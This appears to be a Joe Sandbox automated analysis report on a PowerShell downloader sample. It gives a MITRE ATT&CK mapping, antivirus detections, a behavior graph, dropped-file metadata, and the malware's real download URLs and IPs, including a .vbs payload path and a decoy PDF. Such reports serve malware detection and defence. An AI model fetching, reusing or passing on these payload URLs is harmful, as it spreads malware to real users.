      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity Information1
      Scripting      		Valid Accounts1
      PowerShell      		1
      Scripting      		11
      Process Injection      		11
      Masquerading      		OS Credential Dumping11
      Security Software Discovery      		Remote Services1
      Archive Collected Data      		11
      Encrypted Channel      		Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/Job1
      Registry Run Keys / Startup Folder      		1
      Registry Run Keys / Startup Folder      		31
      Virtualization/Sandbox Evasion      		LSASS Memory1
      Process Discovery      		Remote Desktop ProtocolData from Removable Media3
      Ingress Tool Transfer      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAt1
      DLL Side-Loading      		1
      DLL Side-Loading      		11
      Process Injection      		Security Account Manager31
      Virtualization/Sandbox Evasion      		SMB/Windows Admin SharesData from Network Shared Drive3
      Non-Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Obfuscated Files or Information      		NTDS1
      Application Window Discovery      		Distributed Component Object ModelInput Capture4
      Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      DLL Side-Loading      		LSA Secrets2
      File and Directory Discovery      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials21
      System Information Discovery      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1578234 Sample: raEyjKggAf.ps1 Startdate: 19/12/2024 Architecture: WINDOWS Score: 84 26 x1.i.lencr.org 2->26 28 www.bluemaxxlaser.com 2->28 30 2 other IPs or domains 2->30 38 Antivirus / Scanner detection for submitted sample 2->38 40 Multi AV Scanner detection for submitted file 2->40 42 Yara detected Powershell download and execute 2->42 44 3 other signatures 2->44 9 powershell.exe 16 23 2->9         started        13 svchost.exe 2->13         started        signatures3 process4 dnsIp5 32 www.bluemaxxlaser.com 203.175.174.69, 49720, 80 SGGS-AS-APSGGSSG Singapore 9->32 34 astenterprises.com.pk 107.161.23.150, 443, 49714 RAMNODEUS United States 9->34 46 Powershell creates an autostart link 9->46 15 powershell.exe 23 9->15         started        18 Acrobat.exe 20 73 9->18         started        20 conhost.exe 9->20         started        36 127.0.0.1 unknown unknown 13->36 signatures6 process7 signatures8 48 Loading BitLocker PowerShell Module 15->48 22 AcroCEF.exe 106 18->22         started        process9 process10 24 AcroCEF.exe 22->24         started       

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      raEyjKggAf.ps131%VirustotalBrowse
      raEyjKggAf.ps134%ReversingLabsScript-PowerShell.Downloader.Boxter
      raEyjKggAf.ps1100%AviraTR/PShell.Dldr.VPA

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://www.microsoft.cox0%Avira URL Cloudsafe
      https://www.astenterprises.com.pk/ms/List0%Avira URL Cloudsafe
      http://www.bluua7maxxlasua7r.com/ms/ms.vbs0%Avira URL Cloudsafe
      https://www.astua7ntua7rprisua7s.com.pk/ms/List%20of%20rua7quirua7d%20itua7ms%20and%20sua7rvicua7s.p0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      astenterprises.com.pk
      		107.161.23.150
      		truefalse
        		high
        www.bluemaxxlaser.com
        		203.175.174.69
        		truefalse
          		high
          x1.i.lencr.org
          		unknown
          		unknownfalse
            		high
            www.astenterprises.com.pk
            		unknown
            		unknownfalse
              		high

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://www.bluemaxxlaser.com/ms/ms.vbsfalse
                		high
                https://www.astenterprises.com.pk/ms/List%20of%20required%20items%20and%20services.pdffalse
                  		high

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.2405807547.000001E9BF98E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2405807547.000001E9BF84C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2199750207.0000018B9006C000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://x1.i.lencr.org/2D85F72862B55C4EADD9E66E06947F3D0.6.drfalse
                      		high
                      https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000003.00000002.2182907238.0000018B80228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2182907238.0000018B81626000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2182907238.0000018B8130E000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://www.astenterprises.com.pk/ms/Listpowershell.exe, 00000000.00000002.2325977680.000001E9B0EB6000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://www.astua7ntua7rprisua7s.com.pk/ms/List%20of%20rua7quirua7d%20itua7ms%20and%20sua7rvicua7s.ppowershell.exe, 00000000.00000002.2325977680.000001E9B0EB6000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000003.00000002.2182907238.0000018B80228000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000003.00000002.2182907238.0000018B80228000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000003.00000002.2182907238.0000018B80228000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://go.micropowershell.exe, 00000000.00000002.2325977680.000001E9B0412000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2182907238.0000018B80903000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2182907238.0000018B81626000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://contoso.com/Licensepowershell.exe, 00000003.00000002.2199750207.0000018B9006C000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://contoso.com/Iconpowershell.exe, 00000003.00000002.2199750207.0000018B9006C000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://aka.ms/winsvr-2022-pshelpXpowershell.exe, 00000003.00000002.2182907238.0000018B81626000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://g.live.com/odclientsettings/ProdV21C:svchost.exe, 00000007.00000003.2275115760.000002AEC5FD0000.00000004.00000800.00020000.00000000.sdmp, edb.log.7.drfalse
                                        		high
                                        http://crl.ver)svchost.exe, 00000007.00000002.3371178265.000002AEC628D000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.bluua7maxxlasua7r.com/ms/ms.vbspowershell.exe, 00000000.00000002.2325977680.000001E9AFA12000.00000004.00000800.00020000.00000000.sdmp, raEyjKggAf.ps1true
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.microsoft.coxpowershell.exe, 00000000.00000002.2420839801.000001E9C7A10000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://go.microspowershell.exe, 00000003.00000002.2182907238.0000018B80903000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://github.com/Pester/Pesterpowershell.exe, 00000003.00000002.2182907238.0000018B80228000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.astenterprises.com.pkpowershell.exe, 00000000.00000002.2325977680.000001E9B12C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://astenterprises.com.pkpowershell.exe, 00000000.00000002.2325977680.000001E9B12C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://crl.mpowershell.exe, 00000003.00000002.2207789222.0000018BEFC0C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://g.live.com/odclientsettings/Prod1C:edb.log.7.drfalse
                                                      		high
                                                      https://www.astenterprises.com.pkpowershell.exe, 00000000.00000002.2325977680.000001E9B12BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2325977680.000001E9B0EB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000003.00000002.2182907238.0000018B80228000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://www.bluemaxxlaser.compowershell.exe, 00000000.00000002.2325977680.000001E9B12FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2325977680.000001E9B1358000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://contoso.com/powershell.exe, 00000003.00000002.2199750207.0000018B9006C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.2405807547.000001E9BF98E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2405807547.000001E9BF84C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2199750207.0000018B9006C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://aka.ms/pscore68powershell.exe, 00000000.00000002.2325977680.000001E9AF7E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2182907238.0000018B80001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.2325977680.000001E9AF7E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2182907238.0000018B80001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high

                                                                    World Map of Contacted IPs

                                                                    • No. of IPs < 25%
                                                                    • 25% < No. of IPs < 50%
                                                                    • 50% < No. of IPs < 75%
                                                                    • 75% < No. of IPs

                                                                    Public IPs

                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                    203.175.174.69
                                                                    		www.bluemaxxlaser.comSingapore
                                                                    		24482SGGS-AS-APSGGSSGfalse
                                                                    107.161.23.150
                                                                    		astenterprises.com.pkUnited States
                                                                    		3842RAMNODEUSfalse

                                                                    Private

                                                                    IP
                                                                    127.0.0.1

                                                                    General Information

                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                    Analysis ID:1578234
                                                                    Start date and time:2024-12-19 12:51:43 +01:00
                                                                    Joe Sandbox product:CloudBasic
                                                                    Overall analysis duration:0h 5m 17s
                                                                    Hypervisor based Inspection enabled:false
                                                                    Report type:full
                                                                    Cookbook file name:default.jbs
                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                    Number of analysed new started processes analysed:15
                                                                    Number of new started drivers analysed:0
                                                                    Number of existing processes analysed:0
                                                                    Number of existing drivers analysed:0
                                                                    Number of injected processes analysed:0
                                                                    Technologies:
                                                                    • HCA enabled
                                                                    • EGA enabled
                                                                    • AMSI enabled
                                                                    Analysis Mode:default
                                                                    Analysis stop reason:Timeout
                                                                    Sample name:raEyjKggAf.ps1
                                                                    renamed because original name is a hash value
                                                                    Original Sample Name:ae4ce5950a66f479129844f0bc9f43b4802df2bb28995aef29abbf0ba300b270.ps1
                                                                    Detection:MAL
                                                                    Classification:mal84.evad.winPS1@20/59@5/3
                                                                    EGA Information:Failed
                                                                    HCA Information:
                                                                    • Successful, ratio: 100%
                                                                    • Number of executed functions: 7
                                                                    • Number of non-executed functions: 2
                                                                    Cookbook Comments:
                                                                    • Found application associated with file extension: .ps1

                                                                    Warnings

                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                    • Excluded IPs from analysis (whitelisted): 23.218.208.137, 162.159.61.3, 172.64.41.3, 52.6.155.20, 3.233.129.217, 52.22.41.97, 3.219.243.226, 23.218.208.109, 23.195.61.56, 2.19.198.16, 23.32.239.65, 23.32.239.9, 23.32.239.56, 23.195.39.65, 2.19.198.27, 13.107.246.63, 20.12.23.50, 23.47.168.24
                                                                    • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, client.wns.windows.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, otelrules.azureedge.net, slscr.update.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, geo2.adobe.com, prod.fs.microsoft.com.akadns.net, crl.root-x1.letsencrypt.org.edgekey.net
                                                                    • Execution Graph export aborted for target powershell.exe, PID 2244 because it is empty
                                                                    • Execution Graph export aborted for target powershell.exe, PID 64 because it is empty
                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                    Simulations

                                                                    Behavior and APIs

                                                                    TimeTypeDescription
                                                                    06:52:36API Interceptor64x Sleep call for process: powershell.exe modified
                                                                    06:52:49API Interceptor2x Sleep call for process: svchost.exe modified
                                                                    06:53:00API Interceptor1x Sleep call for process: AcroCEF.exe modified

                                                                    Joe Sandbox View / Context

                                                                    IPs

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    203.175.174.69gCXzb0K8Ci.ps1Get hashmaliciousUnknownBrowse
                                                                    • www.bluemaxxlaser.com/ms/ms.vbs
                                                                    H2PspQWoHE.ps1Get hashmaliciousUnknownBrowse
                                                                    • www.bluemaxxlaser.com/ms/ms.vbs
                                                                    H6epOhxoPY.ps1Get hashmaliciousUnknownBrowse
                                                                    • www.bluemaxxlaser.com/ms/ms.vbs
                                                                    KcKtHBkskI.ps1Get hashmaliciousUnknownBrowse
                                                                    • www.bluemaxxlaser.com/ms/ms.vbs
                                                                    1M1QoJF40r.ps1Get hashmaliciousUnknownBrowse
                                                                    • www.bluemaxxlaser.com/ms/ms.vbs
                                                                    8iAcoQLc3o.ps1Get hashmaliciousUnknownBrowse
                                                                    • www.bluemaxxlaser.com/ms/ms.vbs
                                                                    R7FBVcp1tf.ps1Get hashmaliciousUnknownBrowse
                                                                    • www.bluemaxxlaser.com/ms/ms.vbs
                                                                    2rTi9MgX25.ps1Get hashmaliciousUnknownBrowse
                                                                    • www.bluemaxxlaser.com/ms/ms.vbs
                                                                    fs8cRx6Us2.ps1Get hashmaliciousUnknownBrowse
                                                                    • www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdf
                                                                    ER4HMMzeQ3.ps1Get hashmaliciousUnknownBrowse
                                                                    • www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdf
                                                                    107.161.23.150F8HYX5HOgA.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                      gCXzb0K8Ci.ps1Get hashmaliciousUnknownBrowse
                                                                        H2PspQWoHE.ps1Get hashmaliciousUnknownBrowse
                                                                          H6epOhxoPY.ps1Get hashmaliciousUnknownBrowse
                                                                            KcKtHBkskI.ps1Get hashmaliciousUnknownBrowse
                                                                              1M1QoJF40r.ps1Get hashmaliciousUnknownBrowse
                                                                                8iAcoQLc3o.ps1Get hashmaliciousUnknownBrowse
                                                                                  R7FBVcp1tf.ps1Get hashmaliciousUnknownBrowse
                                                                                    2rTi9MgX25.ps1Get hashmaliciousUnknownBrowse
                                                                                      tmkSAOF3GM.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse

                                                                                        Domains

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        www.bluemaxxlaser.comgCXzb0K8Ci.ps1Get hashmaliciousUnknownBrowse
                                                                                        • 203.175.174.69
                                                                                        H2PspQWoHE.ps1Get hashmaliciousUnknownBrowse
                                                                                        • 203.175.174.69
                                                                                        H6epOhxoPY.ps1Get hashmaliciousUnknownBrowse
                                                                                        • 203.175.174.69
                                                                                        KcKtHBkskI.ps1Get hashmaliciousUnknownBrowse
                                                                                        • 203.175.174.69
                                                                                        1M1QoJF40r.ps1Get hashmaliciousUnknownBrowse
                                                                                        • 203.175.174.69
                                                                                        8iAcoQLc3o.ps1Get hashmaliciousUnknownBrowse
                                                                                        • 203.175.174.69
                                                                                        R7FBVcp1tf.ps1Get hashmaliciousUnknownBrowse
                                                                                        • 203.175.174.69
                                                                                        2rTi9MgX25.ps1Get hashmaliciousUnknownBrowse
                                                                                        • 203.175.174.69
                                                                                        fs8cRx6Us2.ps1Get hashmaliciousUnknownBrowse
                                                                                        • 203.175.174.69
                                                                                        ER4HMMzeQ3.ps1Get hashmaliciousUnknownBrowse
                                                                                        • 203.175.174.69

                                                                                        ASNs

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        RAMNODEUSF8HYX5HOgA.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                        • 107.161.23.150
                                                                                        gCXzb0K8Ci.ps1Get hashmaliciousUnknownBrowse
                                                                                        • 107.161.23.150
                                                                                        H2PspQWoHE.ps1Get hashmaliciousUnknownBrowse
                                                                                        • 107.161.23.150
                                                                                        H6epOhxoPY.ps1Get hashmaliciousUnknownBrowse
                                                                                        • 107.161.23.150
                                                                                        KcKtHBkskI.ps1Get hashmaliciousUnknownBrowse
                                                                                        • 107.161.23.150
                                                                                        1M1QoJF40r.ps1Get hashmaliciousUnknownBrowse
                                                                                        • 107.161.23.150
                                                                                        8iAcoQLc3o.ps1Get hashmaliciousUnknownBrowse
                                                                                        • 107.161.23.150
                                                                                        R7FBVcp1tf.ps1Get hashmaliciousUnknownBrowse
                                                                                        • 107.161.23.150
                                                                                        2rTi9MgX25.ps1Get hashmaliciousUnknownBrowse
                                                                                        • 107.161.23.150
                                                                                        tmkSAOF3GM.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                        • 107.161.23.150
                                                                                        SGGS-AS-APSGGSSGgCXzb0K8Ci.ps1Get hashmaliciousUnknownBrowse
                                                                                        • 203.175.174.69
                                                                                        H2PspQWoHE.ps1Get hashmaliciousUnknownBrowse
                                                                                        • 203.175.174.69
                                                                                        H6epOhxoPY.ps1Get hashmaliciousUnknownBrowse
                                                                                        • 203.175.174.69
                                                                                        KcKtHBkskI.ps1Get hashmaliciousUnknownBrowse
                                                                                        • 203.175.174.69
                                                                                        1M1QoJF40r.ps1Get hashmaliciousUnknownBrowse
                                                                                        • 203.175.174.69
                                                                                        8iAcoQLc3o.ps1Get hashmaliciousUnknownBrowse
                                                                                        • 203.175.174.69
                                                                                        R7FBVcp1tf.ps1Get hashmaliciousUnknownBrowse
                                                                                        • 203.175.174.69
                                                                                        2rTi9MgX25.ps1Get hashmaliciousUnknownBrowse
                                                                                        • 203.175.174.69
                                                                                        fs8cRx6Us2.ps1Get hashmaliciousUnknownBrowse
                                                                                        • 203.175.174.69
                                                                                        ER4HMMzeQ3.ps1Get hashmaliciousUnknownBrowse
                                                                                        • 203.175.174.69

                                                                                        JA3 Fingerprints

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        3b5074b1b5d032e5620f69f9f700ff0egCXzb0K8Ci.ps1Get hashmaliciousUnknownBrowse
                                                                                        • 107.161.23.150
                                                                                        H2PspQWoHE.ps1Get hashmaliciousUnknownBrowse
                                                                                        • 107.161.23.150
                                                                                        0iTxQouy7k.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                        • 107.161.23.150
                                                                                        H6epOhxoPY.ps1Get hashmaliciousUnknownBrowse
                                                                                        • 107.161.23.150
                                                                                        KcKtHBkskI.ps1Get hashmaliciousUnknownBrowse
                                                                                        • 107.161.23.150
                                                                                        1M1QoJF40r.ps1Get hashmaliciousUnknownBrowse
                                                                                        • 107.161.23.150
                                                                                        StGx54oFh6.exeGet hashmaliciousQuasarBrowse
                                                                                        • 107.161.23.150
                                                                                        8iAcoQLc3o.ps1Get hashmaliciousUnknownBrowse
                                                                                        • 107.161.23.150
                                                                                        R7FBVcp1tf.ps1Get hashmaliciousUnknownBrowse
                                                                                        • 107.161.23.150
                                                                                        2rTi9MgX25.ps1Get hashmaliciousUnknownBrowse
                                                                                        • 107.161.23.150

                                                                                        Dropped Files

                                                                                        No context

                                                                                        Created / dropped Files

                                                                                        C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):1310720
                                                                                        Entropy (8bit):0.7263164601429241
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:9J8s6YR3pnhWKInznxTgScwXhCeEcrKYSZNmTHk4UQJ32aqGT46yAwFM5hA7yH0F:9JZj5MiKNnNhoxuw
                                                                                        MD5:4542F2FCC3281CB1DB5097DF9ECC07CF
                                                                                        SHA1:FDCE0ED5ED6923D441B97410C2252C49C91BF803
                                                                                        SHA-256:AED563D241EC3D9DE155B541907F5C0776DE46D35FBC1B9D3925ED1C59E6A294
                                                                                        SHA-512:18A8EFE36509F81C430F311BB63805756EA117AA5E704B72647560F7BC94971EEEE26E60BB06081187CCD063E2874F71B01E88DB925A576E1874FB50DB4C86F8
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:...........@..@9....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................Fajaj.#.........`h.................h.......6.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                                                                        C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                        File Type:Extensible storage user DataBase, version 0x620, checksum 0xdf08333d, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                        Category:dropped
                                                                                        Size (bytes):1310720
                                                                                        Entropy (8bit):0.7555524224807735
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:VSB2ESB2SSjlK/svFH03N9Jdt8lYkr3g16xj2UPkLk+kLWyrufTRryrUYc//kbxW:VazaSvGJzYj2UlmOlOL
                                                                                        MD5:D2A1C8D652EE95BD98E62A901D6E7F02
                                                                                        SHA1:2904A329C1C92C8311A7740FA0156BE8CD3B20EE
                                                                                        SHA-256:329E802449866D54015FB367DC1326F1A9A585947D9562B487C1FE3EAD0812C0
                                                                                        SHA-512:70103818AC0795AF9FD7DDF153315965FBC4B2F4FC854433BE9D3E622C00AA29FC509AE8C0B68B453DD43F46EF99F52149DCFD8FB8D8C4B3B097F1305BF54D0A
                                                                                        Malicious:false
                                                                                        Preview:..3=... .......7.......X\...;...{......................0.e......!...{?.14...|..h.g.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... .......9....{...............................................................................................................................................................................................2...{.....................................u14...|..................W...14...|...........................#......h.g.....................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):16384
                                                                                        Entropy (8bit):0.07993319940693144
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:d5llEYejdZ2373NaAPaU1lbb+2GltAlluxmO+l/SNxOf:fEzjd8TNDPaUH+2QtAgmOH
                                                                                        MD5:D3426B53E891F688EB397C3B3E248FD9
                                                                                        SHA1:EFBD69D15674F577561B2D627E6B4BC5429F9608
                                                                                        SHA-256:15D0A2876974076BCE7397DEAEEA9A6D8A1D62165C991DC0B89FD4CEB1D4B9C2
                                                                                        SHA-512:8FD80E58A3FF730BD25B8387BAF7B74A2936B9885FD596BEEEA72ACA00B60AC80B03B01776E4054D6E2755B6874E82D9BAC1C2A0622C919C4028D24BD966AA06
                                                                                        Malicious:false
                                                                                        Preview:,........................................;...{..14...|...!...{?..........!...{?..!...{?..g...!...{?.................W...14...|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

                                                                                        Download File
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:ASCII text
                                                                                        Category:dropped
                                                                                        Size (bytes):295
                                                                                        Entropy (8bit):5.251956511157485
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:7IFOq2PN72nKuAl9OmbnIFUt8OIKZZmw+OIKzkwON72nKuAl9OmbjLJ:7pvVaHAahFUt8O7/+OR5OaHAaSJ
                                                                                        MD5:A33A495DC05721F9FC8648BCA8A73CD1
                                                                                        SHA1:1DF8F61A0241E6E54B8B12F7E1252044514B36C1
                                                                                        SHA-256:88B2B6B18CCD41D2A5A89D5F441D9592C5F7207203C9F70C82B629080EB24068
                                                                                        SHA-512:C184ED7DA2F7AF636933C3FE31CC957281C28C1CE6A7FD466DA126793260F27DD5D897DF15BAB932FF93EFFB0BB1FED2D7D57F2EBEA06EFB481C438DFF55CB05
                                                                                        Malicious:false
                                                                                        Preview:2024/12/19-06:52:48.784 ba0 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/19-06:52:48.787 ba0 Recovering log #3.2024/12/19-06:52:48.787 ba0 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

                                                                                        Download File
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:ASCII text
                                                                                        Category:dropped
                                                                                        Size (bytes):295
                                                                                        Entropy (8bit):5.251956511157485
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:7IFOq2PN72nKuAl9OmbnIFUt8OIKZZmw+OIKzkwON72nKuAl9OmbjLJ:7pvVaHAahFUt8O7/+OR5OaHAaSJ
                                                                                        MD5:A33A495DC05721F9FC8648BCA8A73CD1
                                                                                        SHA1:1DF8F61A0241E6E54B8B12F7E1252044514B36C1
                                                                                        SHA-256:88B2B6B18CCD41D2A5A89D5F441D9592C5F7207203C9F70C82B629080EB24068
                                                                                        SHA-512:C184ED7DA2F7AF636933C3FE31CC957281C28C1CE6A7FD466DA126793260F27DD5D897DF15BAB932FF93EFFB0BB1FED2D7D57F2EBEA06EFB481C438DFF55CB05
                                                                                        Malicious:false
                                                                                        Preview:2024/12/19-06:52:48.784 ba0 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/19-06:52:48.787 ba0 Recovering log #3.2024/12/19-06:52:48.787 ba0 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

